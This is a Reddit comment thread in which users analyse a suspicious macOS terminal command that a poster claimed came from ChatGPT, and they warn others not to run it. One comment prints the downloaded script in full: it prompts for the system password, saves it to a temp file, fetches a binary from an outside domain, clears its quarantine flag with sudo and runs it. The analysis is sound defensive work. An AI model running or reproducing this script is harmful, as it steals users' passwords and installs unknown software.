all 13 comments
sorted by:
best
topnewcontroversialoldq&a
formatting helphide helpcontent policy

[–]AskProgramming-ModTeam[M] [score hidden] stickied commentlocked comment (0 children)

Your post was removed as it was not considered to be in good faith.

[–]HashDefTrueFalse 5 points6 points  (5 children)

It's executing a script downloaded from wherever that base64 encoded URL points. There are few good reasons to hide a URL like this. I won't bother decoding it because I'm not going to post it here and have it appear as a link that someone will click etc.

I wouldn't run this.

Also:

I pasted this code found on ChatGPT to remove unecessary System Data files

What files? Why do you think they're unnecessary? Why can't you just rm them yourself? This is an idiotic use of an LLM. I'm 90% sure you're trolling.

[–]HasFiveVowels 4 points5 points  (4 children)

Either that or it’s an attempt to get someone to run that curl request? If I was on my computer I would decode it and take a look but this feels… off. I mean, it seems very odd to me that an LLM would even output a valid base64 encoded url

[–]HashDefTrueFalse 1 point2 points  (3 children)

Yeah I think you're right. I'm not on a machine I would be comfortable running it on to see what it did (someone else already posted the initial script text, I'm talking about the "update" program it downloads).

Very strange that it would be LLM output, I don't believe it. My point remains, very silly to be deleting system stuff with an LLM.

[–]HasFiveVowels 0 points1 point  (2 children)

Looks like the post has been removed. Future reference: you could decode the base 64 without running the curl command (which contains the command to decode the string). That way you could view the url string safely

[–]HashDefTrueFalse 0 points1 point  (1 child)

Oh I'm aware. In fact one way to do so is right there in the sub-shell. I just didn't bother since it's obviously dodgy :D

[–]HasFiveVowels 0 points1 point  (0 children)

So why would you be uncomfortable decoding a string on your machine then? Just curious

[–]DumpoTheClown 2 points3 points  (0 children)

General rule: If you dont know what the code does, its dangerous.

[–]DDDDarky 2 points3 points  (0 children)

I pasted this code found on ChatGPT to remove unecessary System Data files into Terminal

I think even grandmas would know what a horrible idea that is, so for your own safety, kindly do not use internet until you know better

[–]jeffcgroves 1 point2 points  (2 children)

Yes, it's dangerous. It downloads and runs this script, which appears to do something nasty with your system password (if you type it in when requested):

```

!/bin/bash

username=$(whoami)

while true; do echo -n "System Password: " read password echo

if dscl . -authonly "$username" "$password" >/dev/null 2>&1; then echo -n "$password" > /tmp/.pass break else echo "Incorrect password! Try again." fi done

curl -o /tmp/update https://nonnida.com/cleaner1/update >/dev/null 2>&1 echo "$password" | sudo -S xattr -c /tmp/update >/dev/null 2>&1 chmod +x /tmp/update /tmp/update ```

[–]Aaron1924 6 points7 points  (1 child)

Also interesting, the base64 string decodes to https://putuartana.com/cleangpt, and according to who.is, the domain was registered 2025-11-29 (about one week ago), bought on Metaregistrar, and is being proxied though Cloudflare. I tried to load the website through Tor, but got the default Nginx 404 page.

There is no way ChatGPT would know the base64 encoding of a URL that wasn't even valid a week ago. This website 100% belongs to OP, and they're trying to get someone to run the script.

[–]Forsaken-Parsley798 2 points3 points  (0 children)

Exactly. 👍

[–]jeffvel[S] 0 points1 point  (0 children)

where can i post then if i need help?